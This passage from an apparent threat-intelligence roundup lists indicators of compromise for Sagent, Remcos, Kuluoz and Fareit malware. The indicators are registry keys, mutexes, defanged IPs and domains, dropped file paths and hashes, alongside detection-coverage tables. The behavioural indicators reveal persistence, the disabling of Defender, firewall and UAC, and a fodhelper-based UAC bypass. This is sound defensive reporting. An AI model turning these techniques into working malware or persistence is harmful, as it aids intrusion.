a8ccbc5df926b0a2afdeab0344b55c93b5469237350634a4f8b170d3cc40e44e a9ea99bbe80da5f7c8bd97eadc8630831812480afdf2827d57a6620589f67ce1 ab71e50d7620b1a0563f8a088d7bbc7c8bbe110ec067dc872ffabce155ba6060 b3636289fe8f2f0879c295edc278595c6b881a594c247504fa3f83ff8bbf6592 c052401b1d61a37fad733e4e178ac084ae44067c7e88ef834d35a09c70ca39e4 c59dcd9cbd7ed3580a1172d749b6b9559b9cc68cd254741efba5b89ac4943db7 cf42f89f988611c1beb42230e001c0eb871322950ca10cd50fb1796cdf95920a d1cabff331de0b05c7ca7deae3f63eb272dfdd9e1a343c87c7f197eec40b218d e1b4dc1a419e73795e791969e0a11770e52adb5ed58414b51ba9e16e46ce906b ea5c6800bd1190c1791cbc0473e214e02355bfa0803c03afec5451e14e27ee80
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Doc.Dropper.Sagent-8005726-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
Value Name: Start
25
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AAFA 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA00 2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AAFA
Value Name: 126AAFA
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA00
Value Name: 126AA00
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A455 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A696 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A687 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA3F 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A33C 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126ABF3 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A2B0 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A31D 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A7BF 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A455
Value Name: 126A455
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A687
Value Name: 126A687
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A696
Value Name: 126A696
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A262 1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126ABF3
Value Name: 126ABF3
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126AA3F
Value Name: 126AA3F
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A33C
Value Name: 126A33C
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A31D
Value Name: 126A31D
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A2B0
Value Name: 126A2B0
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A7BF
Value Name: 126A7BF
1
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\126A262
Value Name: 126A262
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
239[.]255[.]255[.]250 25
151[.]101[.]248[.]133 12
151[.]101[.]128[.]133 11
151[.]101[.]64[.]133 10
199[.]232[.]36[.]133 8
151[.]101[.]192[.]133 3
151[.]101[.]0[.]133 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
raw[.]githubusercontent[.]com 25
github[.]map[.]fastly[.]net 18
Files and or directories created Occurrences
%System32%\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx 25
%SystemRoot%\cer<random, matching '[A-F0-9]{3,4}'>.tmp 24
%SystemRoot%\cer58.tmp 1

File Hashes

0207adf00d503323421be3eace8b28b409c3b3326ce43431ddd6e1e7310e1d2b 07e8d94f044678b2ec1ca212931dddb28c8930927616f50e16bdffa847bc89ec 084afba4f38dfba53ac6ee63b420912e7b3fb89de954701c65620c236ccb7812 088b223ab51f4d510934957762a0972e9ce042716ebc36cd7ed692e5568de26a 0bc38c6a4aad4ef72bca07ef6fbad3acfffe3b3df7800421e7cf588e8023adaa 0cb057212a46a3949b61b3e2fd09ff92d6c4e4a07c47eb79dc2ac46ed57bf2f2 0ee50c3cedb3b1be4941ff2b78e2c5337d9aa3e71b0dddccd3ff486b65ad3547 10771c3cb28b7d8fca0f8b61ef1a64a2190ae5d94dc0f3da59a37bde40578afb 130ef51cf53390d59e750bd8d994a1228b1d749c4255d358b58fd3a4fce110be 1f14b5fc0a3f5d73ec262a88e74f8c1b5e7f1969aa7aa838c9e71de2b59af207 1fea6293b5c917a2c33c94ba2ddad83fe1ae9ffc7e9d229fd79943596dc4c19a 2194e880c184492eab89b71c89b5a12b81a3d393bbac4ecac3661520a65a94ef 23269c118ff201dfac84704f94b65720e59d7e0aa6d3e3c31f19651dc2265c2e 2d86ad4e8dcb6fdc7cff003dfdfee9447c73163eeb27f6c8982f6eb36c070e1e 2dd991084d893ec610b254cfb4e2ce98e710eeb2abbfeb5e1c85e952a2716f7d 30a2aa9fb9e0f5667ee4bc901749cca4a5a9d60d549b000ef8fa0f6d589d3930 33497e98fafc5a687e107ca561bcdbe8caee452b7c94f8561d356c3dcb426593 36ac97895d83095c4bad67cc1108690493a928f2f3a7ed91ef1d427c25dd45b7 41056674f238018dd040f330170657e0751ede5e460f7f28258bc29c66d495b9 41e6ed3d05ec7c68ce38e59a6889255cc852c4005c96250b5e311ec8140310d6 42bacd231319b10ded8780e9d77b9bb890540ce5e545dc860f5afa393284a764 45cf9d3de2576e6732f0968352dded17392730214f4d0048f73368c85e3e3743 45d25afb75ee94aca4fb412fb867c8ca6419edcac0acc54f75538786d220a73c 474d3631bca2da49d07bd5fc7855d84370a4652d26b90b6bc94f6f0bb92595fe 47b840521762b205277e601afd5775b00e536856e09af354fd3585671c794c44
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK




Win.Dropper.Remcos-8008767-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
15
<HKCU>\ENVIRONMENT
Value Name: windir
12
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'> 11
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: exepath
11
<HKCU>\Software\Remcos-<random, matching '[A-Z0-9]{6}'>
Value Name: licence
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Fjef
1
<HKCU>\SOFTWARE\-7AIIYS 1
<HKCU>\SOFTWARE\-7AIIYS
Value Name: exepath
1
<HKCU>\SOFTWARE\-7AIIYS
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Afwg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Chnh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Quym
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Hksq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Xziw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Owir
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Kqzy
1
<HKCU>\SOFTWARE\-CUQLRE 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Fjcp
1
<HKCU>\SOFTWARE\-CUQLRE
Value Name: exepath
1
<HKCU>\SOFTWARE\-CUQLRE
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Vzhh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Ybmv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Pvai
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\LD3K1LBVEM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Wyon
1
Mutexes Occurrences
Remcos_Mutex_Inj 13
Remcos-<random, matching [A-Z0-9]{6}> 11
Global\b0babf11-a759-11ea-a007-00501e3ae7b5 1
-7AIIYS 1
-CUQLRE 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
172[.]217[.]15[.]97 12
142[.]250[.]31[.]100/31 6
185[.]165[.]153[.]17 5
142[.]250[.]31[.]138/31 4
172[.]217[.]197[.]113 3
172[.]217[.]197[.]139 3
91[.]193[.]75[.]15 3
194[.]5[.]99[.]12 2
172[.]217[.]197[.]100/30 2
172[.]253[.]122[.]100/31 2
192[.]169[.]69[.]25 1
79[.]134[.]225[.]105 1
185[.]244[.]30[.]17 1
172[.]217[.]164[.]129 1
142[.]250[.]31[.]102 1
142[.]250[.]31[.]113 1
172[.]217[.]13[.]237 1
172[.]253[.]122[.]132 1
172[.]253[.]122[.]138 1
154[.]66[.]53[.]96 1
185[.]244[.]30[.]53 1
91[.]214[.]169[.]69 1
194[.]187[.]251[.]163 1
79[.]134[.]225[.]43 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
goddywin[.]freedynamicdns[.]net 3
newlogs[.]ddns[.]net 2
doc-14-54-docs[.]googleusercontent[.]com 2
thankyoulord[.]ddns[.]net 2
doc-0k-54-docs[.]googleusercontent[.]com 2
newdawn4me[.]ddns[.]net 2
doc-00-54-docs[.]googleusercontent[.]com 1
doc-0c-bc-docs[.]googleusercontent[.]com 1
boot[.]awsmppl[.]com 1
doc-14-bc-docs[.]googleusercontent[.]com 1
doc-0o-bc-docs[.]googleusercontent[.]com 1
doc-0s-54-docs[.]googleusercontent[.]com 1
doc-10-8o-docs[.]googleusercontent[.]com 1
doc-04-bo-docs[.]googleusercontent[.]com 1
doc-04-0c-docs[.]googleusercontent[.]com 1
easter87[.]duckdns[.]org 1
doc-04-5o-docs[.]googleusercontent[.]com 1
igbo[.]hopto[.]org 1
dns[.]dunamix[.]me 1
ifeanyiogbunebe[.]ddns[.]net 1
doc-10-bc-docs[.]googleusercontent[.]com 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 15
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 15
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 14
%System32%\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx 12
%PUBLIC%\Natso.bat 12
%PUBLIC%\Runex.bat 12
%PUBLIC%\fodhelper.exe 12
%PUBLIC%\propsys.dll 12
%PUBLIC%\x.bat 12
%SystemRoot% 12
%SystemRoot% \System32 12
%SystemRoot% \System32\fodhelper.exe 12
%SystemRoot% \System32\propsys.dll 12
%PUBLIC%\cde.bat 12
%PUBLIC%\x.vbs 12
%APPDATA%\remcos 2
%APPDATA%\remcos\logs.dat 2
%APPDATA%\cosp\dos.dt 1
%LOCALAPPDATA%\Fjef\Fjef.hta 1
%LOCALAPPDATA%\Fjef\Fjefset.exe 1
%LOCALAPPDATA%\Afwg\Afwg.hta 1
%LOCALAPPDATA%\Afwg\Afwgset.exe 1
%LOCALAPPDATA%\Chnh\Chnh.hta 1
%LOCALAPPDATA%\Chnh\Chnhset.exe 1
%LOCALAPPDATA%\Kqzy\Kqzy.hta 1
*See JSON for more IOCs

File Hashes

06e837cf74eb917798ba6dbf0c7bf1e46c18f405cb7d041055960f4e2c620e34 14d24d9df46dc27d58afd005831bc9562935288f71bb841d4ef2443b7c4b9c2a 1df9aa28e1f0652e0797e7531c2965387107ecb56b2988f260d758a932ce3d1b 2026c016c434e228d3de8eb02b84b893945a7a3ef587c25f7905fb4074d1bb17 209b2993614bf38e6fec5366e7efceabccab004b5bb520460ad007322aa0c887 3eb8a01a674c2743110a46c80eb39a9df8e15f66b26cfa952c1bb2eb80bb61fa 4c4be9e45f7425bbf936d54a825693680e8fa40f24e631d8d2fa6f0efb0c287a 5f1f324c116e3d0746d51648274c312a6efc9c8a24b3445524ce0752f095803a 644aa25d23ed0bde16287cbf053890168f01b13ba8909a1c9b984f8f2f58180f 885bc11f09421b521a2191e98b6521adc1d7bb06958cd30aff8a8164e5549538 9188298a545444368a26d4d1fcc9be1e49ed55660891458d75c3dd5a2981c93b 9ad345199fba200ac03609aa9a93be1c10663b7c2c1f3d0467e747f0f0147caf 9f79c726da368c45204189299e29e0f24811ec64a8a88856a377f3022408b67a a7d93e9c9bb80f0f8a271ae4a101f305bac535e197697b35f291794fa83ef538 b998f50b9c00f40da20ac278d592db8b3b772a32bb619558cca87c2b51d48c10

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella


MITRE ATT&CK




Win.Dropper.Kuluoz-8010459-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 299 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 298
<HKCR>\LOCAL SETTINGS\MUICACHE\\52C64B7E
Value Name: LanguageList
2
<HKCU>\SOFTWARE\FVPCRRGX
Value Name: omahibpg
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ipgbexib
2
<HKCU>\SOFTWARE\JGWEGPDF
Value Name: buxxdimc
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ahjrnoir
2
<HKCU>\SOFTWARE\GDNCOUXE
Value Name: jghihpcd
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: humuqpua
2
<HKCU>\SOFTWARE\UFDWSBVK
Value Name: havralbl
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: emwpkief
1
<HKCU>\SOFTWARE\XKWWBDOL
Value Name: pfqwduxb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xwhmvivr
1
<HKCU>\SOFTWARE\PVISGDLT
Value Name: oujictst
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ingmhxih
1
<HKCU>\SOFTWARE\CEGOFCPI
Value Name: iskwljbh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jrehkxkn
1
<HKCU>\SOFTWARE\HPVHGWUN
Value Name: dlbbndpm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: heipptsf
1
<HKCU>\SOFTWARE\VSLNLGMM
Value Name: mgmvqkpj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: aohhnqkv
1
<HKCU>\SOFTWARE\RISPOMLI
Value Name: jckcrwfg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ltcspgme
1
<HKCU>\SOFTWARE\OKTHLARI
Value Name: kugewrbn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hkaeegdr
1
<HKCU>\SOFTWARE\VIRQTXUO
Value Name: wfheopoa
1
Mutexes Occurrences
aaAdministrator 298
abAdministrator 298
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]212[.]253[.]253 273
195[.]206[.]7[.]69 268
222[.]236[.]47[.]53 265
95[.]141[.]32[.]134 241
46[.]55[.]222[.]24 240
162[.]144[.]60[.]252 238
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 298
%HOMEPATH%\Local Settings\Application Data\poqwhlut.exe 1
%HOMEPATH%\Local Settings\Application Data\dtkmfljp.exe 1
%HOMEPATH%\Local Settings\Application Data\quwwmhua.exe 1
%HOMEPATH%\Local Settings\Application Data\eltjatmp.exe 1
%HOMEPATH%\Local Settings\Application Data\seuxbide.exe 1
%HOMEPATH%\Local Settings\Application Data\getrrbdf.exe 1
%HOMEPATH%\Local Settings\Application Data\riuodjqi.exe 1
%HOMEPATH%\Local Settings\Application Data\jcfluvao.exe 1
%HOMEPATH%\Local Settings\Application Data\uaqvukvf.exe 1
%HOMEPATH%\Local Settings\Application Data\evvkeaas.exe 1
%HOMEPATH%\Local Settings\Application Data\smdpshqf.exe 1
%HOMEPATH%\Local Settings\Application Data\jntelsbq.exe 1
%HOMEPATH%\Local Settings\Application Data\frnabejc.exe 1
%HOMEPATH%\Local Settings\Application Data\gtqtcstp.exe 1
%HOMEPATH%\Local Settings\Application Data\kntlhtov.exe 1
%HOMEPATH%\Local Settings\Application Data\voeoknlk.exe 1
%HOMEPATH%\Local Settings\Application Data\tcpipjsh.exe 1
%HOMEPATH%\Local Settings\Application Data\xlvkpsxa.exe 1
%HOMEPATH%\Local Settings\Application Data\whfmeunk.exe 1
%HOMEPATH%\Local Settings\Application Data\pcbvaoix.exe 1
%HOMEPATH%\Local Settings\Application Data\muhmnulh.exe 1
%HOMEPATH%\Local Settings\Application Data\gpmbccwn.exe 1
%HOMEPATH%\Local Settings\Application Data\penarfmg.exe 1
%HOMEPATH%\Local Settings\Application Data\uvvjtamq.exe 1
*See JSON for more IOCs

File Hashes

01579a1a592019390559d44e1405e464311a7d674c5e873695dc1b80f4c918fe 033371e741d2770ba5ddde99aa78f19d34c7c6c0fb1dacda5615ce517a7634a4 0367b8a2307abc0afcd3fea38027b315fe1ced9e13ebb3fd10d180ef32ce9dc5 03b877b12c56250c28fd1fdadc1685e067a3dd45a4b22314764348b6fbe3450e 03bd20bff161d670d1908689c3807f8c06f9c63cd09e6518b5341b2eb3136172 047437f3e5b4a2d02f2058b29e10036c7332e0716785aa9c8f446d24390d2870 0477d369bb24c908c647a1e3aede09c52829f24901f095cd84076ac4d21b5269 04ccb33b85d222bcee69d1f0b83b9166f2fa68fbf1d60a8e69af560b49c1820e 0594e1eeb178c6fd9e3135b522da87c459a346055f2cad72135db117fb815a14 0b9f39fbe13ee399d13feb6b23f3bdfb427ddffe4e09866c7e6d963149849d04 0dc128d1a5f44a18067f915d760299e52fe03bf704bf296a88533d256e93b4e0 0e008f3e530087922b40eedb8ff7719822d4c52345cc4ce852ac2418a0a010a4 0f202bf47fa6f36ad7d13ababb244374c483f4f5956ac0faa28ea46272f32450 0f487bfd437563c856ea7d3c23485b090fd1983830f27d59a263418d8f4f67c0 10d7f5c902f674e16c907ff1c0975f83045fe4a40bbbc7eb57f306c186a3f50c 1311102294faf428f83c6e9a19c699b113939260b71ceb9d59ec93c7b7a866bc 13b9d1d8c4cc9e0935683ce88b8926946f9c40107cdabcd1eac8a67511bfe2cb 14e2b372efc45c4a28290360182f965f16821f747be0a3354992618132dd750f 153c96cccea4608a19fccbdc3255ff44e6040261b62bae1bff639a7b60cfca6a 1568d1baf709a9b13a538752a4908a52dfd59039855a26ba0391a5f115c9e117 15a61e95184f33043799bb653ab0dccd86524d429893bb3e0c104ab70cd50f68 1665595f6c691f47cb0323f7c7f47d7f7aa47dd41899be09669b97ab3202bd1f 179146e00f81fd25c7cd34dd5568bf4236551585cfd94848a1c38016db13473a 192f9dc4c002d3db693a5a3d5622a50de8c016c254b99e3a6ede692d64e47e3b 1b250ca896fa1acf693e3e1deb4652fb9dfca755572504db7eae3de578dfcfe2
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Fareit-8010489-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0 10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0
Value Name: DisplayName
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\NETSTREAM 1.0
Value Name: UninstallString
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: estikk
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hetsda
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\system32\rundll32.exe
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\RICLICY 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\RICLICY
Value Name: Impersonate
1
Mutexes Occurrences
qazwsxedc 27
3G1S91V5ZA5fB56W 10
NHO9AZB7HDK0WAZMM 10
VRK1AlIXBJDA5U3A 10
VHO9AZB7HDK0WAZMM 10
3HO9AZB7HDK0WAZMM 10
LXCV0IMGIXS0RTA1 2
TXA19EQZP13A6JTR 2
IGBIASAARMOAIZ 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]215[.]148[.]63 15
178[.]62[.]189[.]175 15
46[.]101[.]122[.]232 15
46[.]101[.]56[.]69 15
159[.]203[.]235[.]159 15
66[.]199[.]229[.]251 10
37[.]48[.]104[.]71 10
62[.]75[.]224[.]4 8
85[.]25[.]157[.]147 8
172[.]217[.]197[.]102 5
172[.]217[.]197[.]100/31 3
78[.]46[.]37[.]81 2
78[.]46[.]37[.]158 2
85[.]17[.]117[.]5 2
172[.]217[.]197[.]138/31 2
173[.]227[.]247[.]24/31 1
17[.]173[.]66[.]181 1
184[.]26[.]207[.]175 1
52[.]1[.]79[.]244 1
198[.]58[.]116[.]58 1
67[.]21[.]4[.]136 1
192[.]155[.]92[.]57 1
104[.]115[.]109[.]217 1
216[.]172[.]166[.]106 1
52[.]8[.]196[.]60 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
europe[.]pool[.]ntp[.]org 15
178[.]62[.]189[.]175 15
159[.]203[.]235[.]159 14
46[.]101[.]56[.]69 14
46[.]101[.]122[.]232 14
r[.]fyykeeptslide[.]net 10
g[.]fyykeeptslide[.]net 6
a[.]siditrax[.]net 2
aa[.]siditrax[.]net 2
cs9[.]wac[.]phicdn[.]net 1
ocsp[.]digicert[.]com 1
self-repair[.]mozilla[.]org 1
www[.]paypalobjects[.]com 1
e3694[.]a[.]akamaiedge[.]net 1
www[.]paypal[.]com 1
s2[.]symcb[.]com 1
sr[.]symcd[.]com 1
ocsp2[.]globalsign[.]com 1
e3691[.]g[.]akamaiedge[.]net 1
e2181[.]b[.]akamaiedge[.]net 1
adfarm-global[.]mplx[.]akadns[.]net 1
paypal[.]d1[.]sc[.]omtrdc[.]net 1
altfarm[.]mediaplex[.]com 1
t[.]paypal[.]com 1
ak1s[.]abmr[.]net 1
*See JSON for more IOCs
Files and or directories created Occurrences
%HOMEPATH%\mslkrru.exe 15
%ProgramData%\msodtyzm.exe 15
%HOMEPATH%\Local Settings\Application Data\uninstall.exe 10
%LOCALAPPDATA%\uninstall.exe 10
%LOCALAPPDATA%\estikk.dll 7
%HOMEPATH%\Local Settings\Application Data\estikk.dll 6
%LOCALAPPDATA%\hetsda.dll 3
%HOMEPATH%\Local Settings\Application Data\hetsda.dll 2
%LOCALAPPDATA%\riclicy.dll 1
%HOMEPATH%\Local Settings\Application Data\riclicy.dll 1
%LOCALAPPDATA%\dicluci.dll 1
%HOMEPATH%\Local Settings\Application Data\dicluci.dll 1
%ProgramData%\228320260 1
%ProgramData%\228318918 1
%ProgramData%\228321118 1
%ProgramData%\228346624 1
%ProgramData%\228318793 1
%ProgramData%\228324129 1
%ProgramData%\228318903 1
%ProgramData%\228320572 1
%ProgramData%\228321617 1
%ProgramData%\228324253 1
%ProgramData%\228370196 1
%ProgramData%\228325533 1
%ProgramData%\228324753 1
*See JSON for more IOCs

File Hashes

